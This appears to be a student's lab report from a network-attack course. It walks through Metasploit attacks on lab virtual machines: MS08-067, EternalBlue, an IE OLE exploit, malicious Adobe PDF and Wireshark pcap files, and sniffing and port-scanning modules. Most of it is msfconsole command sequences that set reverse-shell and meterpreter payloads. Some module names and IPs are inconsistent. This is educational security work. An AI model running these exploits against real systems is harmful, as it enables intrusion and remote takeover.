首页 > 其他分享 >20201306 Exp6 MSF应用基础

20201306 Exp6 MSF应用基础

时间:2023-05-04 22:11:21浏览次数:39  
标签:set 攻击 Exp6 192.168 漏洞 exploit MSF 靶机 20201306

一、实践内容
二、实践原理
三、实践过程
1、一个主动攻击实践
ms08_067_netapi
ms17_010
2、一个针对浏览器的攻击
ms14_064
ms17-010
3、一个针对客户端的攻击
Adobe
Wireshark
4、成功应用一个辅助模块
sniffer嗅探
portscan端口扫描
MSF使用nmap
四、实践问题回答
五、离实践还缺什么技术或步骤
六、实践心得体会
一、实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

一个主动攻击实践,尽量使用最新的类似漏洞;
一个针对浏览器的攻击,尽量使用最新的类似漏洞;
一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
成功应用任何一个辅助模块。

二、实践原理
MSF攻击方法
主动攻击:扫描主机漏洞
攻击浏览器
供给客户端
六个模块
渗透攻击模块exploit
利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
辅助模块Auxiliary
能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
攻击载荷Payload
在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
三种payload :Single,Stager,Stages。
空字段模块Nop :
一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90,便于快速确定返回地址的位置
编码模块Encoders:
针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
后渗透攻击模块Post :
支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。
MSF的三种用户操作界面
msfconsole
查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
查看设置信息show [options]
查看攻击目标类型show [target]
查找命令search
查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows
armitage
启动服务器service postgresql start
启动armitagearmitage
webgui

三、实践过程
1、一个主动攻击实践
ms08_067_netapi
ms08_067漏洞是著名的远程溢出漏洞。攻击者发送恶意资料到受害机默认开放的SMB服务端口445,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓存区,获得远程代码执行权限,从而完全控制主机。
靶机:Windows 2000
攻击机:Kali
获取靶机IP地址 192.168.42.132
攻击机试探靶机是否存在此漏洞 sudo nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.232.132

攻击机打开MSF
复制代码
sudo msfconsole
search ms08-067 //查看漏洞位置
use exploit/windows/smb/ms08_067_netapi //选择该漏洞
set payload generic/shell_reverse_tcp //设置攻击的载荷
set RHOSTS 192.168.232.132 //靶机IP
set LHOSTS 192.168.232.134 //攻击机IP
exploit //进行攻击
复制代码

攻击成功!

ms17_010
ms07_010 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
靶机:Microsoft Windows 7 x64
攻击机:Kali
查看Win7虚拟机IP地址

关闭Win7防火墙

在kali虚拟机中开启MSF服务
sudo msfconsole
use auxiliary/scanner/smb/smb_ms17_010 //选择攻击漏洞
set RHOSTS 192.168.232.129 //靶机IP地址
exploit //扫描靶机,查看漏洞

利用此漏洞攻击win7主机
use exploit/windows/smb/ms17_010_eternalblue //选择该漏洞
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载荷
set RHOSTS 192.168.232.129 //设置靶机IP
set LHOSTS 192.168.232.134 //设置攻击机IP
exploit //攻击

攻击成功!

2、一个针对浏览器的攻击
ms14_064
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码。

靶机:Windows XP IE浏览器
攻击机:Kali
获取XP虚拟机的IP地址

在攻击机Kali中打开MSF
复制代码
sudo msfconsole
search ms14_064 //查看与此漏洞相关的攻击模块
use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
set payload windows/meterpreter/reverse_tcp //设置攻击载荷
set SRVHOST 192.168.232.134 //设置攻击机IP(kali)
set AllowPowerShellPrompt true //设置powershell
set LHOST 192.168.232.134 //设置监听地址(KaliIP)
set LPORT 1306 //设置监听端口
show targets //查看此漏洞适用的系统版本
set target 0 //设置winXP靶机
show options //查看设置的参数信息
exploit
复制代码

将生成的URL拷贝至Windows XP虚拟机的IE浏览器中运行

回到kali中,看到一些提示会话创建成功的信息,此时用 sessions 查看此时kali中创建的会话
输入 sessions -i 1 即可获取刚刚我们所创建的那个会话连接

输入 ipconfig ,获取到靶机的IP地址

ms17-010
靶机:Windows 7 x64虚拟机的IE浏览器
攻击机:Kali
获取Win7虚拟机的IP地址

在攻击机中打开MSF
复制代码
sudo msfconsole
search ms17-010 //查看与此漏洞相关的攻击模块
use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块
set payload generic/shell_reverse_tcp //设置攻击载荷
set RHOST 192.168.232.129 //设置靶机IP,端口默认为445
set LPORT 1306 //回连的kali虚拟机端口
set LHOST 192.168.232.134 //设置攻击机IP
exploit //发起渗透攻击
复制代码

结果报错,原因为端口占用,于是更换端口号

来到靶机IP浏览器,输入网址监听端口 http://192.168.232.134:1306

3、一个针对客户端的攻击
Adobe
靶机:Windows XP
攻击机:Kali
在靶机中安装Adobe Reader
在Kali中生成利用漏洞的pdf文件
复制代码
msfconsole //进入控制台
search adobe //搜索与adobe有关的漏洞
use windows/fileformat/adobe_cooltype_sing //选择使用此漏洞
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看需要配置的参数选项
set LPORT 1306 //设置端口号
set RHOST 192.168.42.134 //设置靶机IP地址
set FILENAME br.pdf //设置生成的PDF文件名
exploit //生成.pdf文件
复制代码

将生成的PDF文件复制到XP虚拟机中

在kali中开启监听
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看需要配置的参数选项
set LPORT 1306 //设置端口号
set RHOST 192.168.42.134 //设置靶机IP地址
exploit //开启监听

在靶机中使用Adobe Reader打开pdf

攻击成功!

Wireshark
靶机:Windows XP
攻击机:Kali
在XP虚拟机中安装wireshark(版本wireshark1.4.2)
在kali中生成利用漏洞的pcap文件
复制代码
sudo msfconsole //进入控制台
search wireshark //搜索与wireshark有关的漏洞
use exploit/windows/fileformat/wireshark_packet_dect //选择使用此漏洞
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
show options //查看需要配置的参数选项
set LHOST 192.168.42.129 //kali的IP
set LPORT 1306 //设置端口号
set FILENAME br.pcap //设置生成的pcap文件名
exploit //生成.pcap文件
复制代码

将生成的pcap文件复制到XP虚拟机中
在Kali中开启监听
复制代码
sudo msfconsole
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //设置tcp反向连接
show options //查看需要配置的参数选项
set LHOST 192.168.42.129 //kali的IP
set LPORT 1306 //设置监听的端口号
exploit //开启监听
复制代码

在靶机中用Wireshark打开文件

攻击成功!

4、成功应用一个辅助模块
sniffer嗅探
靶机:Windows XP
攻击机:Kali
Kali打开MSF
search sniff //查看嗅探的攻击
use auxiliary/sniffer/psnuffle //进入嗅探器模块
show options //查看参数
set RHOST 192.168.232.131 //靶机IP
run

在靶机中启动浏览器就可以查看到嗅探器捕获的记录

portscan端口扫描
靶机:Windows XP

攻击机:Kali
在Kali中打开MSF
search portscan //搜索与端口扫描相关的模块
use auxiliary/scanner/portscan/tcp //使用此辅助模块扫描靶机tcp端口
show options //显示要设置的参数选项
set RHOSTS 192.168.232.131 //设置要扫描的靶机ip
exploit

MSF使用nmap
在msf控制台中输入 nmap -O -Pn 192.168.232.131 ,查看靶机开放的端口和靶机版本信息。

四、实践问题回答
用自己的话解释什么 是exploit,payload,encode。

exploit:既可以看成是运载恶意代码的载体,也可以理解成利用漏洞进行攻击的通道。
payload:载荷是攻击的具体武器,每次都要进行设置,有些攻击需要匹配特定的payload,如后门等。
encode用来编码,用于伪装,还可以想上课讲的那样消除坏字符。

五、离实践还缺什么技术或步骤
本次实践主要说明了信息搜集、把病毒或后门程序输送到期望的目标机在攻击包括防范漏洞攻击的重要性。经过这次实践,将病毒和后门程序真正展现起作用才是最重要的。除此之外,自己还需要加强解决问题和随机应变分析问题的能力,做到心中有数。

六、实践心得体会
本次的主要实验内容是MSF的基础应用,而在这次实验中,出现最大的问题在于Windows 2000虚拟机的龟龟龟龟速和不好使,还有针对客户端程序攻击的各种问题。在不断的尝试和实践中,我对不同模块的主要内容和功能有了一些掌握,对MSF的应用有了更深入的了解。

标签:set,攻击,Exp6,192.168,漏洞,exploit,MSF,靶机,20201306
From: https://www.cnblogs.com/wulongcan20201306/p/17372705.html

相关文章

  • Exp6 MSF应用基础
    一、实验原理(1)MSF简介Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。(2)程序特点这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使MetasploitFramewo......
  • Exp6 MSF应用基础 20202211王宏韬
    目录1基础问题回答2实验总结与体会3离实践缺少什么4实践过程记录主动攻击实践针对浏览器攻击针对adobe客户端攻击应用辅助模块tcp端口扫描   1基础问题回答 exploit:利用发现的安全漏洞或配置弱点对靶机进行攻击,将payload发送给靶机。payload:植入靶机......
  • 网络对抗实验六 MSF应用基础
    目录实践内容一、主动攻击实践二、针对浏览器的攻击三、针对客户端的攻击四、应用一个辅助模块问题回答一、基础问题回答1.用自己的话解释什么是exploit,payload,encode.二、实践总结与体会实践内容一、主动攻击实践关闭靶机防火墙打开445端口查看版本msfconsolesearchs......
  • Exp6 MSF应用基础 20201331黄文刚
    Exp6MSF应用基础一、实验原理(1)MSF简介Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。(2)程序特点这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使M......
  • Exp6 MSF应用基础-20201324
    目录1实践内容1.0安装靶机1.1一个主动攻击实践,尽量使用最新的类似漏洞;主动攻击实践MS08-0671.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;1.2.1针对浏览器的攻击ms06_013_createtextrange1.2.2针对浏览器的攻击MS14-0641.3一个针对客户端的攻击,如Adobe或office,尽量使用最......
  • MSF专题(3)
    metsvc后门使用如下命令runmetsvc然后重启之后,通过bind_tcp进行主动连接。由于版本问题,在win732位上,相应的服务起不来,不做过多介绍。......
  • 20201306 Exp5 信息搜集与漏洞扫描
    目录一、实践目标及实践内容实践目标实践内容二、实践原理三、实践过程记录1、各种搜索技巧的应用搜索网址目录结构利用搜索引擎搜索特定类型的文件使用traceroute命令进行路由侦查2、DNSIP注册信息的查询whois查询nslookup查询dig查询LP2Location地理位置查询IP......
  • msf
    MSF——基本使用和Exploit模块(一)–走看看(zoukankan.com)1、介绍matasploit,简称msf,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。msfconsole2、永恒之蓝永恒之蓝2017年4月4日黑客团体Brokeers影子经纪人网络攻......
  • msf帮助文档
    1、介绍msf启动后,以交互式窗口命令进行工作。通过help命令查看帮助文档:help2、核心命令3、模块命令4、任务命令5、资源脚本命令6、数据库后端命令7、认证后端命令8、发展命令 ......
  • MSF实战免杀过静态:ShellCode加花指令
    分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中......